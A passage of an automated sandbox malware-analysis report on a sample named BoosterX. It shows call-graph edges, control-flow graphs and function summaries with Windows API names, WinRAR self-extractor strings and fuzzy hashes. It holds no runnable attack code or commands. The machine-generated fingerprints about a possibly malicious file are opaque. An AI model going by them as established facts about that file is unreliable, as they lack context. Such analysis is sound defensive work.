calls 28172->28209 28174 7ff6c036a10b 28174->28078 28176 7ff6c036a26e 28176->28180 28214 7ff6c0368c90 33 API calls 2 library calls 28176->28214 28177 7ff6c036a209 28213 7ff6c038b73c 31 API calls _invalid_parameter_noinfo_noreturn 28177->28213 28178 7ff6c036a362 28179 7ff6c038a3d0 31 API calls 28178->28179 28182 7ff6c036a38b 28179->28182 28180->28178 28186 7ff6c0368e18 33 API calls 28180->28186 28184 7ff6c038a3d0 31 API calls 28182->28184 28183 7ff6c036a12d 28210 7ff6c038b73c 31 API calls _invalid_parameter_noinfo_noreturn 28183->28210 28184->28169 28186->28180 28187 7ff6c036a198 28187->28170 28211 7ff6c0368c90 33 API calls 2 library calls 28187->28211 28188 7ff6c0370ee8 WideCharToMultiByte 28188->28192 28190 7ff6c036a3e9 28215 7ff6c03825a4 8 API calls 28190->28215 28192->28169 28192->28170 28192->28172 28192->28174 28192->28188 28192->28190 28207 7ff6c036aa48 45 API calls 2 library calls 28192->28207 28208 7ff6c038a1f0 31 API calls 2 library calls 28192->28208 28196 7ff6c036a428 28195->28196 28196->28080 28198 7ff6c038a3fd 28197->28198 28204 7ff6c038a412 28198->28204 28216 7ff6c038d61c 15 API calls abort 28198->28216 28200 7ff6c038a407 28217 7ff6c0387864 31 API calls _invalid_parameter_noinfo 28200->28217 28202 7ff6c03822a0 _handle_error 8 API calls 28203 7ff6c0369af7 28202->28203 28203->28153 28204->28202 28205->28134 28206->28192 28207->28192 28208->28192 28209->28183 28210->28187 28211->28170 28212->28177 28213->28176 28214->28180 28215->28136 28216->28200 28217->28204 28230 7ff6c0380d75 14 API calls _com_raise_error

                                                    Executed Functions

                                                    Function 00007FF6C037B110 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                    • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                    • API String ID: 255727823-2702805183
                                                    • Opcode ID: 4e057d484052a99d1df3ac008361d9c0b2871c0de1c67f6c49b051274d14bbe8
                                                    • Instruction ID: f1483af4f468b07e08bed65b2fa5d066cf38fd1c89b9a862b22ebee75a0beb7e
                                                    • Opcode Fuzzy Hash: 4e057d484052a99d1df3ac008361d9c0b2871c0de1c67f6c49b051274d14bbe8
                                                    • Instruction Fuzzy Hash: 0AD2B522A18A83A1FA209F69E8542F96361FF85786F504536DACDC77E6DF3CE644C700
                                                    Function 00007FF6C037CE08 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                    • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                    • API String ID: 3007431893-3916287355
                                                    • Opcode ID: 1243c9d58e10b0f9c1e69fe8408d6eda55fcce4eaed4e803da273c064c99ea82
                                                    • Instruction ID: 0a98439ec0370b38cf958f30d108c576cbacdc658f17b5e575fec85841ee110b
                                                    • Opcode Fuzzy Hash: 1243c9d58e10b0f9c1e69fe8408d6eda55fcce4eaed4e803da273c064c99ea82
                                                    • Instruction Fuzzy Hash: 8713BF22B04B83E9EB109F68D9442EC27B1EB44799F501636DA9DD7BE9DF38E184C340
                                                    Function 00007FF6C03806D4 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1466 7ff6c03806d4-7ff6c03807a9 call 7ff6c036df4c call 7ff6c036629c call 7ff6c03793ec call 7ff6c0383c70 call 7ff6c0379994 1477 7ff6c03807ab-7ff6c03807c0 1466->1477 1478 7ff6c03807e0-7ff6c0380803 1466->1478 1479 7ff6c03807db call 7ff6c038218c 1477->1479 1480 7ff6c03807c2-7ff6c03807d5 1477->1480 1481 7ff6c038083a-7ff6c038085d 1478->1481 1482 7ff6c0380805-7ff6c038081a 1478->1482 1479->1478 1480->1479 1485 7ff6c0380d5d-7ff6c0380d62 call 7ff6c0387884 1480->1485 1483 7ff6c0380894-7ff6c03808b7 1481->1483 1484 7ff6c038085f-7ff6c0380874 1481->1484 1487 7ff6c038081c-7ff6c038082f 1482->1487 1488 7ff6c0380835 call 7ff6c038218c 1482->1488 1491 7ff6c03808b9-7ff6c03808ce 1483->1491 1492 7ff6c03808ee-7ff6c03808fa GetCommandLineW 1483->1492 1489 7ff6c0380876-7ff6c0380889 1484->1489 1490 7ff6c038088f call 7ff6c038218c 1484->1490 1503 7ff6c0380d63-7ff6c0380d70 call 7ff6c0387884 1485->1503 1487->1485 1487->1488 1488->1481 1489->1485 1489->1490 1490->1483 1496 7ff6c03808e9 call 7ff6c038218c 1491->1496 1497 7ff6c03808d0-7ff6c03808e3 1491->1497 1499 7ff6c0380ac7-7ff6c0380ade call 7ff6c0366414 1492->1499 1500 7ff6c0380900-7ff6c0380937 call 7ff6c03878fc call 7ff6c035129c call 7ff6c037ca50 1492->1500 1496->1492 1497->1485 1497->1496 1508 7ff6c0380b09-7ff6c0380c64 call 7ff6c0351fa0 SetEnvironmentVariableW GetLocalTime call 7ff6c0363de8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6c037af94 call 7ff6c036986c call 7ff6c0376734 * 2 DialogBoxParamW call 7ff6c0376828 * 2 1499->1508 1509 7ff6c0380ae0-7ff6c0380b05 call 7ff6c0351fa0 call 7ff6c03835c0 1499->1509 1524 7ff6c038096c-7ff6c0380973 1500->1524 1525 7ff6c0380939-7ff6c038094c 1500->1525 1514 7ff6c0380d75-7ff6c0380daf call 7ff6c0381880 1503->1514 1573 7ff6c0380c6c-7ff6c0380c73 1508->1573 1574 7ff6c0380c66 Sleep 1508->1574 1509->1508 1523 7ff6c0380db4-7ff6c0380e01 1514->1523 1523->1514 1531 7ff6c0380a5b-7ff6c0380a85 call 7ff6c03878fc call 7ff6c035129c call 7ff6c037fc8c 1524->1531 1532 7ff6c0380979-7ff6c0380993 OpenFileMappingW 1524->1532 1529 7ff6c0380967 call 7ff6c038218c 1525->1529 1530 7ff6c038094e-7ff6c0380961 1525->1530 1529->1524 1530->1503 1530->1529 1553 7ff6c0380a8a-7ff6c0380a92 1531->1553 1537 7ff6c0380999-7ff6c03809b9 MapViewOfFile 1532->1537 1538 7ff6c0380a50-7ff6c0380a59 CloseHandle 1532->1538 1537->1538 1542 7ff6c03809bf-7ff6c03809ef UnmapViewOfFile MapViewOfFile 1537->1542 1538->1499 1542->1538 1545 7ff6c03809f1-7ff6c0380a4a call 7ff6c037a110 call 7ff6c037fc8c call 7ff6c036b970 call 7ff6c036babc call 7ff6c036bb2c UnmapViewOfFile 1542->1545 1545->1538 1553->1499 1556 7ff6c0380a94-7ff6c0380aa7 1553->1556 1559 7ff6c0380aa9-7ff6c0380abc 1556->1559 1560 7ff6c0380ac2 call 7ff6c038218c 1556->1560 1559->1560 1565 7ff6c0380d57-7ff6c0380d5c call 7ff6c0387884 1559->1565 1560->1499 1565->1485 1576 7ff6c0380c7a-7ff6c0380c9d call 7ff6c036b89c DeleteObject 1573->1576 1577 7ff6c0380c75 call 7ff6c0379ecc 1573->1577 1574->1573 1581 7ff6c0380ca5-7ff6c0380cac 1576->1581 1582 7ff6c0380c9f DeleteObject 1576->1582 1577->1576 1583 7ff6c0380cc8-7ff6c0380cd9 1581->1583 1584 7ff6c0380cae-7ff6c0380cb5 1581->1584 1582->1581 1586 7ff6c0380ced-7ff6c0380cfa 1583->1586 1587 7ff6c0380cdb-7ff6c0380ce7 call 7ff6c037fda4 CloseHandle 1583->1587 1584->1583 1585 7ff6c0380cb7-7ff6c0380cc3 call 7ff6c035ba1c 1584->1585 1585->1583 1590 7ff6c0380cfc-7ff6c0380d09 1586->1590 1591 7ff6c0380d1f-7ff6c0380d24 call 7ff6c0379464 1586->1591 1587->1586 1594 7ff6c0380d0b-7ff6c0380d13 1590->1594 1595 7ff6c0380d19-7ff6c0380d1b 1590->1595 1596 7ff6c0380d29-7ff6c0380d56 call 7ff6c03822a0 1591->1596 1594->1591 1597 7ff6c0380d15-7ff6c0380d17 1594->1597 1595->1591 1598 7ff6c0380d1d 1595->1598 1597->1591 1598->1591
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 1048086575-3710569615
                                                    • Opcode ID: bb87de0c1b01ed3e0ea964dee26a773d15bb5b82cbf9db583fa815d9bf748bf7
                                                    • Instruction ID: c7ae58a19ba21a41a10e992d4b8bf3cc165ce62ac5561cf0ec33e9e7ff022734
                                                    • Opcode Fuzzy Hash: bb87de0c1b01ed3e0ea964dee26a773d15bb5b82cbf9db583fa815d9bf748bf7
                                                    • Instruction Fuzzy Hash: AE128E31A18B83A1EB109F68E8452B96361FF85786F505236DADDC7BA6EF3CE144C740
                                                    Function 00007FF6C036A46C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                    • String ID: $%s:$CAPTION
                                                    • API String ID: 2100155373-404845831
                                                    • Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                    • Instruction ID: 84114a8db43967562bff8f2297072c8e2642d1cb120668f3c18564c69822c3ba
                                                    • Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                    • Instruction Fuzzy Hash: 37910632B18A5396E718DF39E80066A67A1FB85785F545535EE8EC7B98CF3CE805CB00
                                                    Function 00007FF6C03785A4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                    • String ID: PNG
                                                    • API String ID: 211097158-364855578
                                                    • Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                    • Instruction ID: 414b61d1112af6e09852e22318751e9efd3796943ebc9097f0755d4861bd6a31
                                                    • Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                    • Instruction Fuzzy Hash: AB413C25A09B47A2EF149F5AE54437963A0BF88BD6F140535CE8EC77A4EF7CE4498700
                                                    Function 00007FF6C035F940 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1396COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: __tmp_reference_source_
                                                    • API String ID: 3668304517-685763994
                                                    • Opcode ID: cecce41aa2bc7ce1222cb977a108751a8b352f261223467f6b66be6f95fb3764
                                                    • Instruction ID: 17337cfc50a1267f5bfd8713a3bf5e3e2939094433809ea2151e3bae86819f8e
                                                    • Opcode Fuzzy Hash: cecce41aa2bc7ce1222cb977a108751a8b352f261223467f6b66be6f95fb3764
                                                    • Instruction Fuzzy Hash: 18D29D66A08AC3A6EA648F25E5413AEB7A1FB81785F444132DBDDC77A6CF3CE454C700
                                                    Function 00007FF6C0354840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: CMT
                                                    • API String ID: 3668304517-2756464174
                                                    • Opcode ID: b604c9a845cf12cf003dbce948390fa4b7da71dc3bf0753df9959c8a9c66759f
                                                    • Instruction ID: 06543067478c07d0d9f948c18f3eaddec3237e0c219fcf2e3b63fe5b2e0a514e
                                                    • Opcode Fuzzy Hash: b604c9a845cf12cf003dbce948390fa4b7da71dc3bf0753df9959c8a9c66759f
                                                    • Instruction Fuzzy Hash: 02E2CC2AB08683A6EB28DF65D4602FD77A1BB45789F400136DA9EC77A6DF3CE155C300
                                                    Function 00007FF6C036407C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3498 7ff6c036407c-7ff6c03640b3 3499 7ff6c03640b9-7ff6c03640c1 3498->3499 3500 7ff6c0364192-7ff6c036419f FindNextFileW 3498->3500 3501 7ff6c03640c6-7ff6c03640d8 FindFirstFileW 3499->3501 3502 7ff6c03640c3 3499->3502 3503 7ff6c03641b3-7ff6c03641b6 3500->3503 3504 7ff6c03641a1-7ff6c03641b1 GetLastError 3500->3504 3501->3503 3505 7ff6c03640de-7ff6c0364106 call 7ff6c03669cc 3501->3505 3502->3501 3507 7ff6c03641b8-7ff6c03641c0 3503->3507 3508 7ff6c03641d1-7ff6c0364213 call 7ff6c03878fc call 7ff6c035129c call 7ff6c0368050 3503->3508 3506 7ff6c036418a-7ff6c036418d 3504->3506 3520 7ff6c0364127-7ff6c0364130 3505->3520 3521 7ff6c0364108-7ff6c0364124 FindFirstFileW 3505->3521 3510 7ff6c03642ab-7ff6c03642ce call 7ff6c03822a0 3506->3510 3512 7ff6c03641c2 3507->3512 3513 7ff6c03641c5-7ff6c03641cc call 7ff6c03520b0 3507->3513 3534 7ff6c036424c-7ff6c03642a6 call 7ff6c036f0e8 * 3 3508->3534 3535 7ff6c0364215-7ff6c036422c 3508->3535 3512->3513 3513->3508 3522 7ff6c0364169-7ff6c036416d 3520->3522 3523 7ff6c0364132-7ff6c0364149 3520->3523 3521->3520 3522->3503 3527 7ff6c036416f-7ff6c036417e GetLastError 3522->3527 3525 7ff6c036414b-7ff6c036415e 3523->3525 3526 7ff6c0364164 call 7ff6c038218c 3523->3526 3525->3526 3529 7ff6c03642d5-7ff6c03642db call 7ff6c0387884 3525->3529 3526->3522 3531 7ff6c0364188 3527->3531 3532 7ff6c0364180-7ff6c0364186 3527->3532 3531->3506 3532->3506 3532->3531 3534->3510 3537 7ff6c0364247 call 7ff6c038218c 3535->3537 3538 7ff6c036422e-7ff6c0364241 3535->3538 3537->3534 3538->3537 3541 7ff6c03642cf-7ff6c03642d4 call 7ff6c0387884 3538->3541 3541->3529
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                    • String ID:
                                                    • API String ID: 474548282-0
                                                    • Opcode ID: df5fb015d0809fc36b7a8a0f7a6842cf0e825b584bc584af1691e1d1962cd2a0
                                                    • Instruction ID: dab39743beb0bc49e79a0ad50ed93e6e3bca6cbdb55518426c9ba6f0392a51dd
                                                    • Opcode Fuzzy Hash: df5fb015d0809fc36b7a8a0f7a6842cf0e825b584bc584af1691e1d1962cd2a0
                                                    • Instruction Fuzzy Hash: 9B619062A08A43A6EB109F28E84527D6361FB967A5F505331EAEDC3BD9DF3CD584C700
                                                    Function 00007FF6C0355E2C Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3635 7ff6c0355e2c-7ff6c0356129 call 7ff6c03682fc call 7ff6c03685b0 3641 7ff6c035612e-7ff6c0356132 3635->3641 3642 7ff6c0356134-7ff6c035613c call 7ff6c0356fcc 3641->3642 3643 7ff6c0356141-7ff6c0356171 call 7ff6c0368398 call 7ff6c0368530 call 7ff6c03684e8 3641->3643 3648 7ff6c035697b 3642->3648 3659 7ff6c0356177-7ff6c0356179 3643->3659 3660 7ff6c0356973-7ff6c0356976 call 7ff6c035466c 3643->3660 3650 7ff6c035697e-7ff6c0356985 3648->3650 3652 7ff6c0356987-7ff6c0356998 3650->3652 3653 7ff6c03569b4-7ff6c03569e3 call 7ff6c03822a0 3650->3653 3657 7ff6c035699a-7ff6c03569ad 3652->3657 3658 7ff6c03569af call 7ff6c038218c 3652->3658 3657->3658 3662 7ff6c03569e4-7ff6c03569e9 call 7ff6c0387884 3657->3662 3658->3653 3659->3660 3664 7ff6c035617f-7ff6c0356189 3659->3664 3660->3648 3670 7ff6c03569ea-7ff6c03569ef call 7ff6c0387884 3662->3670 3664->3660 3667 7ff6c035618f-7ff6c0356192 3664->3667 3667->3660 3669 7ff6c0356198-7ff6c03561aa call 7ff6c03685b0 3667->3669 3669->3642 3675 7ff6c03561ac-7ff6c03561fd call 7ff6c03684b8 call 7ff6c03684e8 * 2 3669->3675 3676 7ff6c03569f0-7ff6c03569f7 call 7ff6c0387884 3670->3676 3685 7ff6c035623f-7ff6c0356249 3675->3685 3686 7ff6c03561ff-7ff6c0356222 call 7ff6c035466c call 7ff6c035ba1c 3675->3686 3687 7ff6c035624b-7ff6c0356260 call 7ff6c03684e8 3685->3687 3688 7ff6c0356266-7ff6c0356270 3685->3688 3686->3685 3703 7ff6c0356224-7ff6c035622e call 7ff6c035433c 3686->3703 3687->3660 3687->3688 3692 7ff6c0356272-7ff6c035627b call 7ff6c03684e8 3688->3692 3693 7ff6c035627e-7ff6c0356296 call 7ff6c035334c 3688->3693 3692->3693 3701 7ff6c0356298-7ff6c035629b 3693->3701 3702 7ff6c03562b3 3693->3702 3701->3702 3704 7ff6c035629d-7ff6c03562b1 3701->3704 3705 7ff6c03562b6-7ff6c03562c8 3702->3705 3703->3685 3704->3702 3704->3705 3707 7ff6c03568b7-7ff6c0356929 call 7ff6c0364cc4 call 7ff6c03684e8 3705->3707 3708 7ff6c03562ce-7ff6c03562d1 3705->3708 3727 7ff6c035692b-7ff6c0356934 call 7ff6c03684e8 3707->3727 3728 7ff6c0356936 3707->3728 3709 7ff6c03562d7-7ff6c03562da 3708->3709 3710 7ff6c0356481-7ff6c03564f4 call 7ff6c0364c34 call 7ff6c03684e8 * 2 3708->3710 3709->3710 3712 7ff6c03562e0-7ff6c03562e3 3709->3712 3743 7ff6c03564f6-7ff6c0356500 3710->3743 3744 7ff6c0356507-7ff6c0356533 call 7ff6c03684e8 3710->3744 3715 7ff6c03562e5-7ff6c03562e8 3712->3715 3716 7ff6c035632e-7ff6c0356353 call 7ff6c03684e8 3712->3716 3719 7ff6c035696d-7ff6c0356971 3715->3719 3720 7ff6c03562ee-7ff6c0356329 call 7ff6c03684e8 3715->3720 3732 7ff6c0356355-7ff6c035638f call 7ff6c0354228 call 7ff6c0353c84 call 7ff6c035701c call 7ff6c0351fa0 3716->3732 3733 7ff6c035639e-7ff6c03563c5 call 7ff6c03684e8 call 7ff6c0368344 3716->3733 3719->3650 3720->3719 3729 7ff6c0356939-7ff6c0356946 3727->3729 3728->3729 3735 7ff6c035694c 3729->3735 3736 7ff6c0356948-7ff6c035694a 3729->3736 3779 7ff6c0356390-7ff6c0356399 call 7ff6c0351fa0 3732->3779 3754 7ff6c03563c7-7ff6c0356400 call 7ff6c0354228 call 7ff6c0353c84 call 7ff6c035701c call 7ff6c0351fa0 3733->3754 3755 7ff6c0356402-7ff6c035641f call 7ff6c0368404 3733->3755 3742 7ff6c035694f-7ff6c0356959 3735->3742 3736->3735 3736->3742 3742->3719 3747 7ff6c035695b-7ff6c0356968 call 7ff6c0354840 3742->3747 3743->3744 3756 7ff6c0356549-7ff6c0356557 3744->3756 3757 7ff6c0356535-7ff6c0356544 call 7ff6c0368398 call 7ff6c036f0b4 3744->3757 3747->3719 3754->3779 3776 7ff6c0356475-7ff6c035647c 3755->3776 3777 7ff6c0356421-7ff6c035646f call 7ff6c0368404 * 2 call 7ff6c036c7bc call 7ff6c03849f0 3755->3777 3762 7ff6c0356559-7ff6c035656c call 7ff6c0368398 3756->3762 3763 7ff6c0356572-7ff6c0356595 call 7ff6c03684e8 3756->3763 3757->3756 3762->3763 3780 7ff6c0356597-7ff6c035659e 3763->3780 3781 7ff6c03565a0-7ff6c03565b0 3763->3781 3776->3719 3777->3776 3779->3733 3785 7ff6c03565b3-7ff6c03565eb call 7ff6c03684e8 * 2 3780->3785 3781->3785 3799 7ff6c03565ed-7ff6c03565f4 3785->3799 3800 7ff6c03565f6-7ff6c03565fa 3785->3800 3802 7ff6c0356603-7ff6c0356632 3799->3802 3800->3802 3804 7ff6c03565fc 3800->3804 3805 7ff6c0356634-7ff6c0356638 3802->3805 3806 7ff6c035663f 3802->3806 3804->3802 3805->3806 3807 7ff6c035663a-7ff6c035663d 3805->3807 3808 7ff6c0356641-7ff6c0356656 3806->3808 3807->3808 3809 7ff6c03566ca 3808->3809 3810 7ff6c0356658-7ff6c035665b 3808->3810 3811 7ff6c03566d2-7ff6c0356731 call 7ff6c0353d00 call 7ff6c0368404 call 7ff6c0370cd4 3809->3811 3810->3809 3812 7ff6c035665d-7ff6c0356683 3810->3812 3823 